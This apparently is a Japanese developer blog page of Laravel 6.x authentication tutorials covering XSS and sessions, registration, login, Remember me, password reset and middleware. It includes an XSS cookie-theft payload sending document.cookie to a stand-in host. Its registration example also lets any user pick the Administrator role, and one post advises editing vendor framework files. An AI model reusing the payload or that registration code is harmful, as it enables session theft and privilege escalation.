Laravel Login – ソフトウェアエンジニアの技術ブログ：Software engineer tech blog

Laravel 6.xのXSS対策とlaravel_session

# XSSとは
-入力フォームに、jsコードやhtmlタグを入力する攻撃
-例:input formにscriptタグ挿入

<script> window.alert('アラートメッセージ'); </script>

## XSS 具体例
### セッションハイジャック
Cookieにhttponly属性がついていない場合、jsのdocument.cookieを読み取ることで、Cookieに含まれているセッション情報を盗み見ることが可能
– 具体的には、不正なサイトに誘導され、セッションIDを不正表示させて、セッション情報を盗み取る

document.location="http://hoge/cookie.cgi?cookie="+document.cookie"

※JavaScriptで保存する方法では、CookieはそのJavaScriptが実行されるページのドメインと関連付けられる
– セッションIDが固定の場合も、盗み取られるリスクが高くなる

## サニタイジング(エスケープ方法)
### PHP
htmlspecialchars関数でサニタイジングを行う

$data = htmlspecialchars($str, ENT_QUOTES, 'utf-8');

### Laravel
viewで{{}}で囲うと、自動的にhtmlentites関数をかけて出力する

## セッションクッキーの有効期限
### Laravelのセッションクッキーの有効期限
config/session.php
デフォルトでは120分で設定されている。セッション無期限の場合はリスクが高まる

'lifetime' => env('SESSION_LIFETIME', 120),

## session IDとは
ブラウザ側ではCookieでsession IDを保存する
セッションを一意に識別するための情報
cookieの値は、.envのAPP_KEYを用いて復号化される
.envでSESSION_DRIVERはcookieと設定されている

SESSION_DRIVER=cookie

### laravel_sessionの値
session情報はユーザログインする毎にIDが更新される
### XSRF_TOKEN
CSRF(クロスサイトリクエストフォージェリ)対策に使用するためのTOKENデータ

### cookieのsessionデータを取得

$data = $request->session()->all();
        dd($data);

array:5 [▼
  "_token" => "WZjodO3c6IVXifN9uK9iFgalJHvDn******"
  "_flash" => array:2 [▶]
  "url" => []
  "_previous" => array:1 [▼
    "url" => "http://192.168.33.10:8000/admin"
  ]
  "login_web_59ba36addc2b2f9401580f014c7*******" => 2
]

sessionに保存されているユーザidのkeyは’id’ではなく、”login_web_****”となっているのがわかる。
その為、$request->session()->get(‘id’);では、idは取得できない。

Illuminate\Session\Store.php

public function __construct($name, SessionHandlerInterface $handler, $id = null)
    {
        $this->setId($id);
        $this->name = $name;
        $this->handler = $handler;
    }
// 省略
public function migrate($destroy = false)
    {
        if ($destroy) {
            $this->handler->destroy($this->getId());
        }

        $this->setExists(false);

        $this->setId($this->generateSessionId());

        return true;
    }
// 省略
public function setId($id)
    {
        $this->id = $this->isValidId($id) ? $id : $this->generateSessionId();
    }

sessionのstore.phpを見ると、$idからsessionIdをsetしていることがわかる。
login_web_*のvalueから認証しているように見えるが、laravelの公式ドキュメントを見ても、laravel_sessionのロジックは一切書いてないな(笑)

Laravel 6.x authのユーザ登録(/register)をカスタマイズ

– authのユーザ登録(/register)の項目をカスタマイズする
–> デフォルトのカラムに対し、usersテーブルにrole_id(admin/subscriber)が追加されており、authのユーザ登録(/register)でも、role_idのradioボタンを追加して登録できるようにしたい

### usersテーブル

Schema::create('users', function (Blueprint $table) {
            $table->bigIncrements('id');
            $table->integer('role_id')->nullable();
            $table->string('name');
            $table->string('email')->unique();
            $table->timestamp('email_verified_at')->nullable();
            $table->string('password');
            $table->rememberToken();
            $table->timestamps();
        });

### register.blade.php

/resources/views/auth/register.blade.php

<div class="card-body">
　　　　<form method="POST" action="{{ route('register') }}">
       @csrf
　　　　// 省略
<div class="col-md-6">
        <div class="form-inline">
            <div class="form-check">
                <input id="role_id" type="radio" class="form-control mr-1 @error('role_id') is-invalid @enderror" name="role_id" value="1" required autocomplete="off" checked>
                <label class="form-check-label mr-3" type="radio">Administrator</label>
            </div>
            
            <div class="form-check">
                <input id="role_id" type="radio" class="form-control mr-1 @error('role_id') is-invalid @enderror" name="role_id" value="2" required autocomplete="off">
                <label class="form-check-label mr-3" type="radio">Subscriber</label>
            </div>
        </div>

        @error('role_id')
            <span class="invalid-feedback" role="alert">
                <strong>{{ $message }}</strong>
            </span>
        @enderror
    </div>
</div>
　　　　// 省略
　　　　</form>
</div>

### RegisterController.php
app/Http/Controllers/Auth/RegisterController.php

protected function validator(array $data)
    {
        return Validator::make($data, [
            'name' => ['required', 'string', 'max:255'],
            'role_id' => ['required'],
            'email' => ['required', 'string', 'email', 'max:255', 'unique:users'],
            'password' => ['required', 'string', 'min:8', 'confirmed'],
        ]);
    }

    /**
     * Create a new user instance after a valid registration.
     *
     * @param  array  $data
     * @return \App\User
     */
    protected function create(array $data)
    {
        return User::create([
            'name' => $data['name'],
            'role_id' => $data['role_id'],
            'email' => $data['email'],
            'password' => Hash::make($data['password']),
        ]);
    }

### User.php

protected $fillable = [
        'name', 'email', 'role_id', 'password',
    ];

mysql> select * from users;

$dataとしてPOSTされたデータをcreateしている。
よく編集されるページなのか、RegisterController.phpは非常に分かりやすい構造になっています。

Laravel Remember meの機能とは？

ログイン時のsessionの扱いについて見てみましょう。

### laravel session
login画面にアクセスすると、tokenに加え、laravel_sessionのcookieが付与されます。
– ログイン前

– ログイン後

### cookiの設定
app/config/session.php
-> デフォルトでは120分、ブラウザを閉じても保存されたまま
-> セッションが切れると、ユーザ認証は不可能になる

'lifetime' => env('SESSION_LIFETIME', 120),
'expire_on_close' => false,

### Remember meにcheckを入れてログイン
– ログイン前

– ログイン後
-> remember_web_* のcookieが新たに発行されている
-> remember_web_*があれば、１２０分で、laravel_sessionが切れても、ログオフしない限り5年間ログインなしでアクセス可能になる。

remember meを実装するかどうかは、サービス内容やセキュリティポリシーによるので、よく考えて検討した方が良さそうです。自分以外のパソコンや端末からログインする機会は、割と溢れてますからね。

Laravel 6.x ログイン画面のカスタマイズ

### login.blade.php
resources/views/auth/login.blade.php
-> 一応、login_cp.blade.phpでコピーを取っておきます。
-> 日本語化しながら、何が書かれているのか確認していきます。

<form method="POST" action="{{ route('login') }}">
                        @csrf

                        <div class="form-group row">
                            <label for="email" class="col-md-4 col-form-label text-md-right">{{ __('メールアドレス') }}</label>

                            <div class="col-md-6">
                                <input id="email" type="email" class="form-control @error('email') is-invalid @enderror" name="email" value="{{ old('email') }}" required autocomplete="email" autofocus>

                                @error('email')
                                    <span class="invalid-feedback" role="alert">
                                        <strong>{{ $message }}</strong>
                                    </span>
                                @enderror
                            </div>
                        </div>

                        <div class="form-group row">
                            <label for="password" class="col-md-4 col-form-label text-md-right">{{ __('パスワード') }}</label>

                            <div class="col-md-6">
                                <input id="password" type="password" class="form-control @error('password') is-invalid @enderror" name="password" required autocomplete="current-password">

                                @error('password')
                                    <span class="invalid-feedback" role="alert">
                                        <strong>{{ $message }}</strong>
                                    </span>
                                @enderror
                            </div>
                        </div>

                        <div class="form-group row">
                            <div class="col-md-6 offset-md-4">
                                <div class="form-check">
                                    <input class="form-check-input" type="checkbox" name="remember" id="remember" {{ old('remember') ? 'checked' : '' }}>

                                    <label class="form-check-label" for="remember">
                                        {{ __('ログイン状態を記憶') }}
                                    </label>
                                </div>
                            </div>
                        </div>

                        <div class="form-group row mb-0">
                            <div class="col-md-8 offset-md-4">
                                <button type="submit" class="btn btn-primary">
                                    {{ __('ログイン') }}
                                </button>

                                @if (Route::has('password.request'))
                                    <a class="btn btn-link" href="{{ route('password.request') }}">
                                        {{ __('パスワードを忘れた方はこちら') }}
                                    </a>
                                @endif
                            </div>
                        </div>
                    </form>

– FormはPostメソッドで、actionはroute(‘login’)
– メールのnameはemail
– パスワードのnameはpassword
– remember meのnameはremember
– パスワード再発行のリンク先はroute(‘password.request’)
– エラー時には、input formにis-invalidのclassを付けている

### エラーメッセージの日本語化
config/app.php

'locale' => 'ja',

resources/lang/ja/auth.php
※en/auth.phpをコピー。ログインのエラーメッセージはvalidation.phpとは異なるので注意が必要

    // 'failed' => 'These credentials do not match our records.',
    // 'throttle' => 'Too many login attempts. Please try again in :seconds seconds.',
    'failed' => '認証情報が記録と一致しません。',
    'throttle' => 'ログイン試行が規定回数を超えました。:seconds秒後に再開できます。',

$ php artisan config:cache

同様に、resources/views/auth/passwordsのemail, resetと、resources/lang/ja/のpasswordsを編集していきます。
verify.blade.phpと/passwords/confirm.blade.phpは、laravel5.7系から実装された、Email Verification機能。必要に応じて実装。

Laravel 6.x Auth機能のregister(ユーザ登録)を無効化

### デフォルト
routes/web.php

Auth::routes();

ルーティングの設定
vendor/laravel/framework/src/Illuminate/Routing/Router.php

public function auth(array $options = [])
    {
        // Authentication Routes...
        $this->get('login', 'Auth\LoginController@showLoginForm')->name('login');
        $this->post('login', 'Auth\LoginController@login');
        $this->post('logout', 'Auth\LoginController@logout')->name('logout');

        // Registration Routes...
        if ($options['register'] ?? true) {
            $this->get('register', 'Auth\RegisterController@showRegistrationForm')->name('register');
            $this->post('register', 'Auth\RegisterController@register');
        }

        // Password Reset Routes...
        if ($options['reset'] ?? true) {
            $this->resetPassword();
        }

        // Password Confirmation Routes...
        if ($options['confirm'] ??
            class_exists($this->prependGroupNamespace('Auth\ConfirmPasswordController'))) {
            $this->confirmPassword();
        }

        // Email Verification Routes...
        if ($options['verify'] ?? false) {
            $this->emailVerification();
        }
    }

Registrationをコメントアウト

// Registration Routes...
        // if ($options['register'] ?? true) {
        //     $this->get('register', 'Auth\RegisterController@showRegistrationForm')->name('register');
        //     $this->post('register', 'Auth\RegisterController@register');
        // }

すると、/register のURLが無効化され、/registerを叩くと、404と表示されるようになる。

Laravel 6.x ログイン認証制限のカスタマイズ

### デフォルト設定
– 試行回数: 5回
– ロック時間 : 45 seconds

app/Http/Controllers/Auth/LoginController.php

protected $maxAttempts = 5;
protected $decayMinutes = 5;

▼ログイン機能の実装
/vendor/laravel/framework/src/Illuminate/Foundation/Auth/ThrottlesLogins.php

Laravel パスワードリセットメール・文面カスタマイズ

### メール本文テンプレート作成
resources/views/mail/passwordreset.blade.php

<body>
	<h1>パスワードリセット</h1>
	<p>以下のボタンを押下し、パスワードリセットの手続きを行ってください。</p>
	<p id="button">
		<a href="{{ $reset_url }}">パスワードリセット</a>
	</p>
</body>

### 通知クラス
$ php artisan make:notification PasswordResetNotification
app/Notifications/PasswordResetNotification.php が生成される

    public $token;
    protected $title = 'パスワードリセット通知'
    /**
     * Create a new notification instance.
     *
     * @return void
     */
    public function __construct($token)
    {
        //
        $this->token = $token;
    }

    /**
     * Get the notification's delivery channels.
     *
     * @param  mixed  $notifiable
     * @return array
     */
    public function via($notifiable)
    {
        return ['mail'];
    }

    /**
     * Get the mail representation of the notification.
     *
     * @param  mixed  $notifiable
     * @return \Illuminate\Notifications\Messages\MailMessage
     */
    //テンプレートとテンプレートに渡す引数
    public function toMail($notifiable)
    {
        return (new MailMessage)
                    ->subject($this->title)
                    ->view(
                        'mail.passwordreset',
                        [
                            'reset_url' => url('password/reset', $this->token),
                        ]);
    }

    /**
     * Get the array representation of the notification.
     *
     * @param  mixed  $notifiable
     * @return array
     */
    public function toArray($notifiable)
    {
        return [
            //
        ];
    }

### User.php

use App\Notifications\PasswordResetNotification;
public function sendPasswordResetNotification($token){
        $this->notify(new PasswordResetNotification($token));
    }

sendPasswordResetNotificationのオーバーライドはcontrollerではなく、Userモデルで行う。

Laravel 6.x ログアウトの遷移先指定

デフォルトだとログアウト処理では、’/'(ルート)に遷移する

### view

<form id="logout-form" action="{{ route('logout') }}" method="POST" name="logout">
        @csrf
   <a href="javascript:document.logout.submit()">ログアウト</a>
</form>

### LoginController.php
app/Http/Controllers/Auth/LoginController.php
->/hogeに遷移

use Illuminate\Support\Facades\Auth;
public function logout(Request $request){
        Auth::logout();

        $this->guard()->logout();

        $request->session()->invalidate();

        return $this->loggedOut($request) ?: redirect('/hoge'); 
    }

Laravel 6.x usersテーブルに最終ログイン日時の保存

# 初期
### usersにlast loginカラムを追加
mysql> describe users;

$ php artisan make:migration add_column_last_login_at_users_table –table=users
***_add_column_last_login_at_users_table.php

public function up()
    {
        Schema::table('users', function (Blueprint $table) {
            //
            $table->timestamp('last_login_at')->nullable()->after('remember_token')->comment('最終ログイン');
        });
    }

public function down()
    {
        Schema::table('users', function (Blueprint $table) {
            //
            $table->dropColumn('last_login_at');
        });
    }

$ php artisan migrate
mysql> describe users;

### Logined eventとLastLoginListeners listenerを作成
app/Providers/EventServiceProvider.php

protected $listen = [
        Registered::class => [
            SendEmailVerificationNotification::class,
        ],
        // ログイン時にイベント発行
        'App\Events\Logined' => [
            // 最終ログインを記録するリスナー
            'App\Listeners\LastLoginListener',
        ],
    ];

$ php artisan event:generate

### listenerで、lastlogin日時をDBに保存する
– event側は処理なし
app/Listeners/LastLoginListener.php

use Illuminate\Support\Facades\Auth;
use Carbon\Carbon;
public function handle(Logined $event)
    {
        //
        $user = Auth::user();
        $user->last_login_at = Carbon::now();
        $user->save();
    }

### LoginControllerでeventを呼び込む
app/Http/Controllers/Auth/LoginController.php

use Illuminate\Http\Request;
use App\Events\Logined;
protected function authenticated(Request $request, $user)
    {
        event(new Logined());
    }

mysql> select * from users;
+—-+———+————–+——————+——————-+————————————————————–+————————————————————–+———————+———————+———————+
| id | role_id | name | email | email_verified_at | password | remember_token | last_login_at | created_at | updated_at |
+—-+———+————–+——————+——————-+————————————————————–+————————————————————–+———————+———————+———————+
| 1 | 1 | 田中太郎 | tanaka@***.com | NULL | **** | **** | 2020-02-21 09:50:03 | 2020-02-20 08:51:14 | 2020-02-21 09:50:03 |
| 2 | 2 | 山田一郎 | yamada@***.com | NULL | **** | **** | NULL | 2020-02-20 08:52:15 | 2020-02-20 08:52:15 |
+—-+———+————–+——————+——————-+————————————————————–+————————————————————–+———————+———————+———————+
2 rows in set (0.00 sec)
公式ドキュメント:https://readouble.com/laravel/6.x/ja/authentication.html

Routingでmiddlewareを制御する方法

middlewareが複数ある場合は、ブランケットで配列にして渡す

Route::group(['middleware' => ['auth','IsAdmin'] ], function(){
	Route::get('/admin/', 'AdminController@index');
});

Route::group(['middleware' => ['auth', 'IsSubscriber']], function(){
	Route::get('/', 'SubscriberController@index');
});

Route::group(['middleware' => 'auth'], function(){
	Route::get('/create', 'SubscriberController@create');
});

controllerが読み込まれる前に処理するか、controllerのconstructorで処理するかの違いだが、どちらでも動くには変わりないが、指定するmiddlewareの機能や、CPUのレジストリ処理の特性を考えると、controller側よりもルーティングで指定した方が効率が良いと考えられる。